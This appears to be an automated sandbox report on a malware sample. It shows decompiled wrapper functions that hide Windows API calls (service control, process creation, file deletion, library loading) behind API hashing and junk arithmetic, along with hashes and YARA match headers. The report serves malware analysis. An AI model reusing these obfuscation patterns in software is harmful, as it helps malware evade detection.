                                          				E0022602B(_t30);
                                          				_v12 = 0x5e3c;
                                          				_t41 = 0x63;
                                          				_v12 = _v12 / _t41;
                                          				_t42 = 0x2f;
                                          				_v12 = _v12 / _t42;
                                          				_v12 = _v12 ^ 0x000064be;
                                          				_v8 = 0x74da;
                                          				_v8 = _v8 | 0xfefeeaea;
                                          				_v8 = _v8 >> 0xc;
                                          				_v8 = _v8 ^ 0x000fb531;
                                          				E002307A9(0x44082a3f, 0x2c3ac9a2, _t42, _t42, 0x18a);
                                          				_t39 = OpenSCManagerW(0, 0, _a16); // executed
                                          				return _t39;
                                          			}










                                          APIs
                                          • OpenSCManagerW.ADVAPI32(00000000,00000000,?), ref: 002229DC
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.2096635547.0000000000221000.00000020.00000001.sdmp, Offset: 00220000, based on PE: true
                                          • Associated: 00000008.00000002.2096631731.0000000000220000.00000004.00000001.sdmp
                                          • Associated: 00000008.00000002.2096662869.000000000023C000.00000004.00000001.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: ManagerOpen
                                          • String ID: <^
                                          • API String ID: 1889721586-3203995635
                                          • Opcode ID: 65485d950964110f61f8f9941fc07d1101582776214450038a05023cc6a25d4d
                                          • Instruction ID: 37b4d298cd155c94a1be96190f1608c22ec2d5d7dc8241c68084df23160ea007
                                          • Opcode Fuzzy Hash: 65485d950964110f61f8f9941fc07d1101582776214450038a05023cc6a25d4d
                                          • Instruction Fuzzy Hash: E5016D72A00108BFEB14DF95DC4A8DFBFB6EF44310F108088F508A6250D7B69F619B91
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 58%
                                          			E0022C6C7(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
                                          				signed int _v8;
                                          				unsigned int _v12;
                                          				intOrPtr _v16;
                                          				intOrPtr _v20;
                                          				intOrPtr _v24;
                                          				intOrPtr _v28;
                                          				void* _t29;
                                          				intOrPtr* _t33;
                                          				void* _t34;
                                          
                                          				E0022602B(_t29);
                                          				_v28 = 0x4fe02f;
                                          				_v24 = 0x232390;
                                          				_v20 = 0xf8460;
                                          				_v16 = 0;
                                          				_v12 = 0xf625;
                                          				_v12 = _v12 >> 6;
                                          				_v12 = _v12 >> 0xa;
                                          				_v12 = _v12 + 0xffffcc6f;
                                          				_v12 = _v12 ^ 0xffffa5b6;
                                          				_v8 = 0xe5cd;
                                          				_v8 = _v8 + 0xffffae4d;
                                          				_v8 = _v8 | 0xf8bbefe7;
                                          				_v8 = _v8 ^ 0xf8bbcc9a;
                                          				_t33 = E002307A9(0x59a47438, 0xd39e34db, __ecx, __ecx, 0x1e9);
                                          				_t34 =  *_t33(0, _a16, 0, 0, _a4, __ecx, __edx, _a4, 0, _a12, _a16, _a20, 0, 0); // executed
                                          				return _t34;
                                          			}













                                          APIs
                                          • SHGetFolderPathW.SHELL32(00000000,00232390,00000000,00000000,FFFFA5B6), ref: 0022C762
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.2096635547.0000000000221000.00000020.00000001.sdmp, Offset: 00220000, based on PE: true
                                          • Associated: 00000008.00000002.2096631731.0000000000220000.00000004.00000001.sdmp
                                          • Associated: 00000008.00000002.2096662869.000000000023C000.00000004.00000001.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: FolderPath
                                          • String ID: /O
                                          • API String ID: 1514166925-1923427199
                                          • Opcode ID: 126e875f67a9f2879335132fa059b233a736e7d205ba747755af06be747269f3
                                          • Instruction ID: 9aff3a284bdbc7005846512a2e192847c3488d4c6c202e5d49d862151a6953d0
                                          • Opcode Fuzzy Hash: 126e875f67a9f2879335132fa059b233a736e7d205ba747755af06be747269f3
                                          • Instruction Fuzzy Hash: 711133B290122DBBCB25DF95DC498EFBFB8EF04714F108188F90962210D3B14B659BE0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 82%
                                          			E00221000(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, WCHAR* _a12) {
                                          				unsigned int _v8;
                                          				signed int _v12;
                                          				signed int _v16;
                                          				intOrPtr _v20;
                                          				intOrPtr _v24;
                                          				void* _t33;
                                          				struct HINSTANCE__* _t40;
                                          				signed int _t42;
                                          
                                          				_push(_a12);
                                          				_push(_a8);
                                          				_push(_a4);
                                          				E0022602B(_t33);
                                          				_v16 = _v16 & 0x00000000;
                                          				_v24 = 0x1b2eda;
                                          				_v20 = 0x33a3b7;
                                          				_v12 = 0x98c;
                                          				_v12 = _v12 + 0xb426;
                                          				_v12 = _v12 + 0x5beb;
                                          				_t42 = 0x63;
                                          				_v12 = _v12 / _t42;
                                          				_v12 = _v12 ^ 0x00000fce;
                                          				_v8 = 0x120e;
                                          				_v8 = _v8 + 0xfffffcb8;
                                          				_v8 = _v8 + 0xffffefaa;
                                          				_v8 = _v8 >> 5;
                                          				_v8 = _v8 ^ 0x07ff9a02;
                                          				E002307A9(0xa900db79, 0x9164b7cc, _t42, _t42, 0xdd);
                                          				_t40 = LoadLibraryW(_a12); // executed
                                          				return _t40;
                                          			}












                                          APIs
                                          • LoadLibraryW.KERNEL32(0033A3B7), ref: 00221096
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.2096635547.0000000000221000.00000020.00000001.sdmp, Offset: 00220000, based on PE: true
                                          • Associated: 00000008.00000002.2096631731.0000000000220000.00000004.00000001.sdmp
                                          • Associated: 00000008.00000002.2096662869.000000000023C000.00000004.00000001.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: LibraryLoad
                                          • String ID: [
                                          • API String ID: 1029625771-3431493590
                                          • Opcode ID: 9c9d41f3e216c02b3eee0186e3ef491d10086b4a6365e8d72269f8dd80ebe146
                                          • Instruction ID: 9b0b4243c09f153743ba963f172af61627f32187394d3e2d1bec8dfbc1c5dfe0
                                          • Opcode Fuzzy Hash: 9c9d41f3e216c02b3eee0186e3ef491d10086b4a6365e8d72269f8dd80ebe146
                                          • Instruction Fuzzy Hash: 8C015BB6D01308BBDF04DFA4C94A5DEBBB1AB54318F108188E41466291D3B19B649B91
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 100%
                                          			E00224859() {
                                          				signed int _v8;
                                          				signed int _v12;
                                          				void* _t22;
                                          
                                          				_v12 = 0xafe2;
                                          				_v12 = _v12 * 0x42;
                                          				_v12 = _v12 + 0xffffdd89;
                                          				_v12 = _v12 ^ 0x002d198d;
                                          				_v8 = 0x5b09;
                                          				_v8 = _v8 | 0xa1ea9544;
                                          				_v8 = _v8 * 0x12;
                                          				_v8 = _v8 ^ 0x6283d9c1;
                                          				E002307A9(0xc44181ea, 0x9164b7cc, _t22, _t22, 0x1a5);
                                          				ExitProcess(0);
                                          			}







                                          APIs
                                          • ExitProcess.KERNELBASE(00000000), ref: 002248B7
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.2096635547.0000000000221000.00000020.00000001.sdmp, Offset: 00220000, based on PE: true
                                          • Associated: 00000008.00000002.2096631731.0000000000220000.00000004.00000001.sdmp
                                          • Associated: 00000008.00000002.2096662869.000000000023C000.00000004.00000001.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: ExitProcess
                                          • String ID: [
                                          • API String ID: 621844428-1822564810
                                          • Opcode ID: ffab03bb8b36d9f8c6ed4855f41195a310f3e0c6a27eecdabbfc4dde42890251
                                          • Instruction ID: 81f399a38b3290deff4e9d0da5b8e83badc44d24b0f9d8852c102545871cb71b
                                          • Opcode Fuzzy Hash: ffab03bb8b36d9f8c6ed4855f41195a310f3e0c6a27eecdabbfc4dde42890251
                                          • Instruction Fuzzy Hash: 7AF017B0A15209FBDB04CFE8CA9699EBFB9EB40301F20818CE444B7290E3B15F509B50
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 66%
                                          			E00234F7D(void* __ecx, void* __edx, void* _a4) {
                                          				signed int _v8;
                                          				signed int _v12;
                                          				void* _t17;
                                          				int _t24;
                                          
                                          				_push(__ecx);
                                          				_push(__ecx);
                                          				_push(_a4);
                                          				_push(__ecx);
                                          				E0022602B(_t17);
                                          				_v12 = 0xddd8;
                                          				_v12 = _v12 * 0x48;
                                          				_v12 = _v12 ^ 0x003e66d8;
                                          				_v8 = 0xcb35;
                                          				_v8 = _v8 ^ 0x7b88573c;
                                          				_v8 = _v8 * 0x59;
                                          				_v8 = _v8 ^ 0xf27e4a21;
                                          				E002307A9(0x6d6c237b, 0x9164b7cc, __ecx, __ecx, 0xce);
                                          				_t24 = CloseHandle(_a4); // executed
                                          				return _t24;
                                          			}








                                          APIs
                                          • CloseHandle.KERNELBASE(003E66D8), ref: 00234FE2
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.2096635547.0000000000221000.00000020.00000001.sdmp, Offset: 00220000, based on PE: true
                                          • Associated: 00000008.00000002.2096631731.0000000000220000.00000004.00000001.sdmp
                                          • Associated: 00000008.00000002.2096662869.000000000023C000.00000004.00000001.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: CloseHandle
                                          • String ID: {#lm
                                          • API String ID: 2962429428-1564096886
                                          • Opcode ID: b50878758ca05e8eac60d1a1146cf5201f1efae4b397f9b7fdbd1e363743abdf
                                          • Instruction ID: 425c42de30eaec02a6b06aeb807420b13a9b3e840beb4bdeece3b006ea06cbfa
                                          • Opcode Fuzzy Hash: b50878758ca05e8eac60d1a1146cf5201f1efae4b397f9b7fdbd1e363743abdf
                                          • Instruction Fuzzy Hash: E9F037B181120CFFDB04DFA4D98689EBFBAEB40300F208199E804AB250D3715B50AB50
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 21%
                                          			E0023976F(void* __ecx, struct _PROCESS_INFORMATION* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, struct _STARTUPINFOW* _a20, int _a24, intOrPtr _a28, intOrPtr _a40, intOrPtr _a44, intOrPtr _a52, intOrPtr _a56, WCHAR* _a60, WCHAR* _a68) {
                                          				unsigned int _v8;
                                          				signed int _v12;
                                          				void* _t34;
                                          				int _t39;
                                          				struct _PROCESS_INFORMATION* _t48;
                                          
                                          				_push(__ecx);
                                          				_push(__ecx);
                                          				_t48 = __edx;
                                          				_push(0);
                                          				_push(_a68);
                                          				_push(0);
                                          				_push(_a60);
                                          				_push(_a56);
                                          				_push(_a52);
                                          				_push(0);
                                          				_push(_a44);
                                          				_push(_a40);
                                          				_push(0);
                                          				_push(0);
                                          				_push(_a28);
                                          				_push(_a24);
                                          				_push(_a20);
                                          				_push(_a16);
                                          				_push(_a12);
                                          				_push(_a8);
                                          				_push(_a4);
                                          				_push(__edx);
                                          				_push(__ecx);
                                          				E0022602B(_t34);
                                          				_v12 = 0xaff9;
                                          				_v12 = _v12 | 0xcee54bd1;
                                          				_v12 = _v12 + 0x6ed6;
                                          				_v12 = _v12 ^ 0xcee61221;
                                          				_v8 = 0x6229;
                                          				_v8 = _v8 ^ 0x42aa9f31;
                                          				_v8 = _v8 >> 2;
                                          				_v8 = _v8 ^ 0x10aad83f;
                                          				E002307A9(0xf0de9e9f, 0x9164b7cc, __ecx, __ecx, 0x155);
                                          				_t39 = CreateProcessW(_a68, _a60, 0, 0, _a24, 0, 0, 0, _a20, _t48); // executed
                                          				return _t39;
                                          			}









                                          APIs
                                          • CreateProcessW.KERNEL32(0022591A,?,00000000,00000000,?,00000000,00000000,00000000,?,?,?,?,?,?,?,0022591A), ref: 00239816
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.2096635547.0000000000221000.00000020.00000001.sdmp, Offset: 00220000, based on PE: true
                                          • Associated: 00000008.00000002.2096631731.0000000000220000.00000004.00000001.sdmp
                                          • Associated: 00000008.00000002.2096662869.000000000023C000.00000004.00000001.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: CreateProcess
                                          • String ID:
                                          • API String ID: 963392458-0
                                          • Opcode ID: 6869d8763d8071430bf2275e85cbffb8ce4b60d48a278036a99dc26001f63f15
                                          • Instruction ID: 9a7324920c6fa73872278b88570e0d2bf5650161ff1a26a3230580b4f81e3e9e
                                          • Opcode Fuzzy Hash: 6869d8763d8071430bf2275e85cbffb8ce4b60d48a278036a99dc26001f63f15
                                          • Instruction Fuzzy Hash: 3B11B072911188BBDF1A9FD6DC0ACDF7F7AEF89750F108148FA1556120D2728A60EBA0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 31%
                                          			E0022B566(void* __ecx, long __edx, intOrPtr _a4, intOrPtr _a8, long _a12, intOrPtr _a16, intOrPtr _a24, intOrPtr _a28, long _a32, intOrPtr _a36, intOrPtr _a40, long _a44, WCHAR* _a48) {
                                          				unsigned int _v8;
                                          				signed int _v12;
                                          				void* _t32;
                                          				void* _t38;
                                          				long _t47;
                                          
                                          				_push(__ecx);
                                          				_push(__ecx);
                                          				_push(_a48);
                                          				_t47 = __edx;
                                          				_push(_a44);
                                          				_push(_a40);
                                          				_push(_a36);
                                          				_push(_a32);
                                          				_push(_a28);
                                          				_push(_a24);
                                          				_push(0);
                                          				_push(_a16);
                                          				_push(_a12);
                                          				_push(_a8);
                                          				_push(_a4);
                                          				_push(__edx);
                                          				_push(0);
                                          				E0022602B(_t32);
                                          				_v8 = 0xfd14;
                                          				_v8 = _v8 >> 4;
                                          				_v8 = _v8 * 0x7a;
                                          				_v8 = _v8 >> 9;
                                          				_v8 = _v8 ^ 0x00002bef;
                                          				_v12 = 0x4f26;
                                          				_v12 = _v12 | 0xe7e97f76;
                                          				_v12 = _v12 ^ 0xe7e94dbb;
                                          				E002307A9(0xfbdf2264, 0x9164b7cc, __ecx, __ecx, 0x1bd);
                                          				_t38 = CreateFileW(_a48, _a12, _t47, 0, _a44, _a32, 0); // executed
                                          				return _t38;
                                          			}









                                          APIs
                                          • CreateFileW.KERNELBASE(00230668,?,?,00000000,?,?,00000000,?,?,?,047BBE06,00230668,?,?,?,?), ref: 0022B5FD
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.2096635547.0000000000221000.00000020.00000001.sdmp, Offset: 00220000, based on PE: true
                                          • Associated: 00000008.00000002.2096631731.0000000000220000.00000004.00000001.sdmp
                                          • Associated: 00000008.00000002.2096662869.000000000023C000.00000004.00000001.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: CreateFile
                                          • String ID:
                                          • API String ID: 823142352-0
                                          • Opcode ID: 2ad720b21a0c423b8602bfec827dffa1ac762b31964bb8a48031e4882696984a
                                          • Instruction ID: e1549cc0f43a334951d18b49cf8d68a4c31339b5c1d8a32f795c95a95794c2c5
                                          • Opcode Fuzzy Hash: 2ad720b21a0c423b8602bfec827dffa1ac762b31964bb8a48031e4882696984a
                                          • Instruction Fuzzy Hash: 8511C372801248BBDF16DF95DD06CEE7F7AFF89314F148198FA1862120D3729A20EB50
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 54%
                                          			E0023981E(long __ecx, void* __edx, long _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
                                          				signed int _v8;
                                          				signed int _v12;
                                          				void* _t22;
                                          				void* _t28;
                                          				void* _t34;
                                          				long _t37;
                                          
                                          				_push(__ecx);
                                          				_push(__ecx);
                                          				_push(_a16);
                                          				_t34 = __edx;
                                          				_t37 = __ecx;
                                          				_push(_a12);
                                          				_push(_a8);
                                          				_push(_a4);
                                          				_push(__edx);
                                          				_push(__ecx);
                                          				E0022602B(_t22);
                                          				_v12 = 0xe68;
                                          				_v12 = _v12 * 0x39;
                                          				_v12 = _v12 ^ 0xd1b1d871;
                                          				_v12 = _v12 ^ 0xd1b2fb7e;
                                          				_v8 = 0x629e;
                                          				_v8 = _v8 + 0xfffff5da;
                                          				_v8 = _v8 | 0xbef7b77b;
                                          				_v8 = _v8 ^ 0xbef79fc3;
                                          				E002307A9(0xd2423672, 0x9164b7cc, __ecx, __ecx, 0x1ff);
                                          				_t28 = RtlAllocateHeap(_t34, _a4, _t37); // executed
                                          				return _t28;
                                          			}










                                          APIs
                                          • RtlAllocateHeap.NTDLL(00000000,D1B2FB7E,00000001,?,?,?,002287F2,0000CAAE,0000510C,AD82F196), ref: 0023989B
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.2096635547.0000000000221000.00000020.00000001.sdmp, Offset: 00220000, based on PE: true
                                          • Associated: 00000008.00000002.2096631731.0000000000220000.00000004.00000001.sdmp
                                          • Associated: 00000008.00000002.2096662869.000000000023C000.00000004.00000001.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: AllocateHeap
                                          • String ID:
                                          • API String ID: 1279760036-0
                                          • Opcode ID: 02fa28ec4255ecfe7622b3d83f76bf8205b256d3275c7cf82a1049aea6bd8148
                                          • Instruction ID: befe9fe0183202295763c4f616bb3e888194596f68a67a8b2acadb36196cd915
                                          • Opcode Fuzzy Hash: 02fa28ec4255ecfe7622b3d83f76bf8205b256d3275c7cf82a1049aea6bd8148
                                          • Instruction Fuzzy Hash: 92015A76801208FBDB04EFE5DC46CDFBF79EF85750F108199F918A6220E6719B619BA0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 62%
                                          			E00237BF4(struct _SHFILEOPSTRUCTW* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
                                          				signed int _v8;
                                          				signed int _v12;
                                          				void* _t24;
                                          				int _t31;
                                          				signed int _t33;
                                          				struct _SHFILEOPSTRUCTW* _t40;
                                          
                                          				_push(__ecx);
                                          				_push(__ecx);
                                          				_push(_a12);
                                          				_t40 = __ecx;
                                          				_push(_a8);
                                          				_push(_a4);
                                          				_push(__ecx);
                                          				E0022602B(_t24);
                                          				_v8 = 0xa117;
                                          				_t33 = 0x76;
                                          				_v8 = _v8 / _t33;
                                          				_v8 = _v8 >> 4;
                                          				_v8 = _v8 ^ 0x210fe703;
                                          				_v8 = _v8 ^ 0x210fdcea;
                                          				_v12 = 0xf1e9;
                                          				_v12 = _v12 << 9;
                                          				_v12 = _v12 ^ 0x01e3a445;
                                          				E002307A9(0x6b98377a, 0xd39e34db, _t33, _t33, 0x219);
                                          				_t31 = SHFileOperationW(_t40); // executed
                                          				return _t31;
                                          			}










                                          APIs
                                          • SHFileOperationW.SHELL32(68CF93E9,?,?,?,?,?,?), ref: 00237C67
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.2096635547.0000000000221000.00000020.00000001.sdmp, Offset: 00220000, based on PE: true
                                          • Associated: 00000008.00000002.2096631731.0000000000220000.00000004.00000001.sdmp
                                          • Associated: 00000008.00000002.2096662869.000000000023C000.00000004.00000001.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: FileOperation
                                          • String ID:
                                          • API String ID: 3080627654-0
                                          • Opcode ID: ec0cacec5e68fb90f10cfb9f5f8a6d9ee760356c7ab0c34d434bb37ff5978ad8
                                          • Instruction ID: 0e41601c5170870fff14c69e3aeec768b21d7b82c6e0726c682f4726547fb5ef
                                          • Opcode Fuzzy Hash: ec0cacec5e68fb90f10cfb9f5f8a6d9ee760356c7ab0c34d434bb37ff5978ad8
                                          • Instruction Fuzzy Hash: D2014FB190120CFFEB09DFA4D84A8DEBBB5EF44314F108198F40567240E6B15F609B91
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 52%
                                          			E0022F65F(int __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, short* _a12, void* _a16, intOrPtr _a20) {
                                          				unsigned int _v8;
                                          				signed int _v12;
                                          				void* _t24;
                                          				void* _t29;
                                          				int _t35;
                                          
                                          				_push(__ecx);
                                          				_push(__ecx);
                                          				_push(_a20);
                                          				_t35 = __ecx;
                                          				_push(_a16);
                                          				_push(_a12);
                                          				_push(_a8);
                                          				_push(_a4);
                                          				_push(__ecx);
                                          				E0022602B(_t24);
                                          				_v12 = 0xd5a7;
                                          				_v12 = _v12 ^ 0x994cba9d;
                                          				_v12 = _v12 ^ 0x994c19d3;
                                          				_v8 = 0xac88;
                                          				_v8 = _v8 << 3;
                                          				_v8 = _v8 >> 8;
                                          				_v8 = _v8 + 0xebed;
                                          				_v8 = _v8 ^ 0x0000ab82;
                                          				E002307A9(0x1b506617, 0x2c3ac9a2, __ecx, __ecx, 0x18c);
                                          				_t29 = OpenServiceW(_a16, _a12, _t35); // executed
                                          				return _t29;
                                          			}









                                          APIs
                                          • OpenServiceW.ADVAPI32(BB1E804F,0000AB81,A536EF12), ref: 0022F6D8
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.2096635547.0000000000221000.00000020.00000001.sdmp, Offset: 00220000, based on PE: true
                                          • Associated: 00000008.00000002.2096631731.0000000000220000.00000004.00000001.sdmp
                                          • Associated: 00000008.00000002.2096662869.000000000023C000.00000004.00000001.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: OpenService
                                          • String ID:
                                          • API String ID: 3098006287-0
                                          • Opcode ID: 6567ea87a17df60c0308b73184139fb23dc7eaa7bd850ee34e454fe5b2712021
                                          • Instruction ID: c219bc23b31abedc45fcf728708936782f9d9bba77c4ca36990c459a2553eb13
                                          • Opcode Fuzzy Hash: 6567ea87a17df60c0308b73184139fb23dc7eaa7bd850ee34e454fe5b2712021
                                          • Instruction Fuzzy Hash: 3001E5B6901208BBEF059F94DC4A8DF7F75EB05324F148188F90462250D6B25F21EBA1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 58%
                                          			E0022B6DD(void* __ecx, void* __edx, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
                                          				signed int _v8;
                                          				unsigned int _v12;
                                          				void* _t23;
                                          				intOrPtr* _t27;
                                          				void* _t28;
                                          
                                          				E0022602B(_t23);
                                          				_v12 = 0x9431;
                                          				_v12 = _v12 >> 7;
                                          				_v12 = _v12 ^ 0x0000160f;
                                          				_v8 = 0xc972;
                                          				_v8 = _v8 ^ 0x829e0126;
                                          				_v8 = _v8 + 0x4512;
                                          				_v8 = _v8 + 0xffff18f9;
                                          				_v8 = _v8 ^ 0x829e24c1;
                                          				_t27 = E002307A9(0x6460e96, 0x9164b7cc, __ecx, __ecx, 0x114);
                                          				_t28 =  *_t27(_a8, 0, _a16, 0x28, 0, __edx, 0x28, _a8, _a12, _a16, _a20, __ecx, __ecx); // executed
                                          				return _t28;
                                          			}









                                          APIs
                                          • SetFileInformationByHandle.KERNELBASE(?,00000000,?,00000028), ref: 0022B759
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.2096635547.0000000000221000.00000020.00000001.sdmp, Offset: 00220000, based on PE: true
                                          • Associated: 00000008.00000002.2096631731.0000000000220000.00000004.00000001.sdmp
                                          • Associated: 00000008.00000002.2096662869.000000000023C000.00000004.00000001.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: FileHandleInformation
                                          • String ID:
                                          • API String ID: 3935143524-0
                                          • Opcode ID: f3b47d937ccbfc1dfa1fb592565fa620fdcbc58eeb5ca1dc2caafddb8630e31b
                                          • Instruction ID: 805ceceae2d365355b6515513bd125146e4d87094100ab013cfcd0affd305b92
                                          • Opcode Fuzzy Hash: f3b47d937ccbfc1dfa1fb592565fa620fdcbc58eeb5ca1dc2caafddb8630e31b
                                          • Instruction Fuzzy Hash: 99012CB6951308FBEB45DF94DD06A9E7BB5EB14704F108188FA0566190D3B15A20AB61
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 58%
                                          			E0023AA3C(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, WCHAR* _a12) {
                                          				signed int _v8;
                                          				unsigned int _v12;
                                          				void* _t21;
                                          				int _t27;
                                          
                                          				_push(__ecx);
                                          				_push(__ecx);
                                          				_push(_a12);
                                          				_push(_a8);
                                          				_push(_a4);
                                          				_push(__ecx);
                                          				E0022602B(_t21);
                                          				_v12 = 0xcc49;
                                          				_v12 = _v12 << 6;
                                          				_v12 = _v12 >> 2;
                                          				_v12 = _v12 ^ 0x000ca988;
                                          				_v8 = 0x5d85;
                                          				_v8 = _v8 | 0xb9d19a55;
                                          				_v8 = _v8 * 0xd;
                                          				_v8 = _v8 ^ 0x6fa87272;
                                          				E002307A9(0x330b490b, 0x9164b7cc, __ecx, __ecx, 0xb9);
                                          				_t27 = DeleteFileW(_a12); // executed
                                          				return _t27;
                                          			}








                                          APIs
                                          • DeleteFileW.KERNELBASE(?,?,?,?,A6E18774,?,?), ref: 0023AAA8
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.2096635547.0000000000221000.00000020.00000001.sdmp, Offset: 00220000, based on PE: true
                                          • Associated: 00000008.00000002.2096631731.0000000000220000.00000004.00000001.sdmp
                                          • Associated: 00000008.00000002.2096662869.000000000023C000.00000004.00000001.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: DeleteFile
                                          • String ID:
                                          • API String ID: 4033686569-0
                                          • Opcode ID: 45dcdf6a4fffdfc3fb2b59b925c3fbc0a67555bc5588bf158da43ded6a3f2711
                                          • Instruction ID: 9cd5d96fc3e82e5584044280d79d9400fa05233e4d0ba42093466a1b2956cd93
                                          • Opcode Fuzzy Hash: 45dcdf6a4fffdfc3fb2b59b925c3fbc0a67555bc5588bf158da43ded6a3f2711
                                          • Instruction Fuzzy Hash: 37F069B191020CFFDF08DFA4DD4A89EBFB4EB40304F108088F805A6250D3B29B649B50
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 70%
                                          			E00225FB2(void* __ecx, void* __edx, void* _a4) {
                                          				signed int _v8;
                                          				signed int _v12;
                                          				void* _t21;
                                          				int _t27;
                                          
                                          				_push(__ecx);
                                          				_push(__ecx);
                                          				_push(_a4);
                                          				_push(__ecx);
                                          				E0022602B(_t21);
                                          				_v12 = 0x33d;
                                          				_v12 = _v12 + 0xc3dc;
                                          				_v12 = _v12 | 0x39ccfb02;
                                          				_v12 = _v12 ^ 0x39ccf342;
                                          				_v8 = 0xe8d9;
                                          				_v8 = _v8 * 0x16;
                                          				_v8 = _v8 | 0x4145347f;
                                          				_v8 = _v8 ^ 0x9035ef96;
                                          				_v8 = _v8 ^ 0xd1609914;
                                          				E002307A9(0x6b3db31e, 0x2c3ac9a2, __ecx, __ecx, 0x1d5);
                                          				_t27 = CloseServiceHandle(_a4); // executed
                                          				return _t27;
                                          			}








                                          APIs
                                          • CloseServiceHandle.ADVAPI32(39CCF342), ref: 00226025
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.2096635547.0000000000221000.00000020.00000001.sdmp, Offset: 00220000, based on PE: true
                                          • Associated: 00000008.00000002.2096631731.0000000000220000.00000004.00000001.sdmp
                                          • Associated: 00000008.00000002.2096662869.000000000023C000.00000004.00000001.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: CloseHandleService
                                          • String ID:
                                          • API String ID: 1725840886-0
                                          • Opcode ID: 07ec7a3e7fbf6174b9072a74acebe146c12452aee72241e4f1ccd61842b21ecb
                                          • Instruction ID: 387793bae81884d9a14c57a036e56674b9d0b2d7ca770b560513c090cdc2bd9c
                                          • Opcode Fuzzy Hash: 07ec7a3e7fbf6174b9072a74acebe146c12452aee72241e4f1ccd61842b21ecb
                                          • Instruction Fuzzy Hash: 88F04FB0C11208FFDB08DFA0E94689EBFB8EB40300F208198E409A7260E7B19F159F54
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Non-executed Functions

                                          Executed Functions

                                          C-Code - Quality: 62%
                                          			E007A2959(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, int _a16) {
                                          				unsigned int _v8;
                                          				signed int _v12;
                                          				void* _t30;
                                          				void* _t39;
                                          				signed int _t41;
                                          				signed int _t42;
                                          
                                          				_push(_a16);
                                          				_push(_a12);
                                          				_push(_a8);
                                          				_push(_a4);
                                          				_push(0);
                                          				_push(0);
                                          				E007A602B(_t30);
                                          				_v12 = 0x5e3c;
                                          				_t41 = 0x63;
                                          				_v12 = _v12 / _t41;
                                          				_t42 = 0x2f;
                                          				_v12 = _v12 / _t42;
                                          				_v12 = _v12 ^ 0x000064be;
                                          				_v8 = 0x74da;
                                          				_v8 = _v8 | 0xfefeeaea;
                                          				_v8 = _v8 >> 0xc;
                                          				_v8 = _v8 ^ 0x000fb531;
                                          				E007B07A9(0x44082a3f, 0x2c3ac9a2, _t42, _t42, 0x18a);
                                          				_t39 = OpenSCManagerW(0, 0, _a16); // executed
                                          				return _t39;
                                          			}










                                          APIs
                                          • OpenSCManagerW.ADVAPI32(00000000,00000000,?), ref: 007A29DC
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.2098980384.00000000007A1000.00000020.00000001.sdmp, Offset: 007A0000, based on PE: true
                                          • Associated: 00000009.00000002.2098970238.00000000007A0000.00000004.00000001.sdmp
                                          • Associated: 00000009.00000002.2099057824.00000000007BC000.00000004.00000001.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: ManagerOpen
                                          • String ID: <^
                                          • API String ID: 1889721586-3203995635
                                          • Opcode ID: 65485d950964110f61f8f9941fc07d1101582776214450038a05023cc6a25d4d
                                          • Instruction ID: 3c9219e7960b641eb35d90ec273b61ea86f7d417f0455c733e893febdd344bb6
                                          • Opcode Fuzzy Hash: 65485d950964110f61f8f9941fc07d1101582776214450038a05023cc6a25d4d
                                          • Instruction Fuzzy Hash: 13018072A00108BFEB14DF95DC0A8DFBFB6EF45310F108088F508A6250D7B65F619B91
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 58%
                                          			E007AC6C7(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
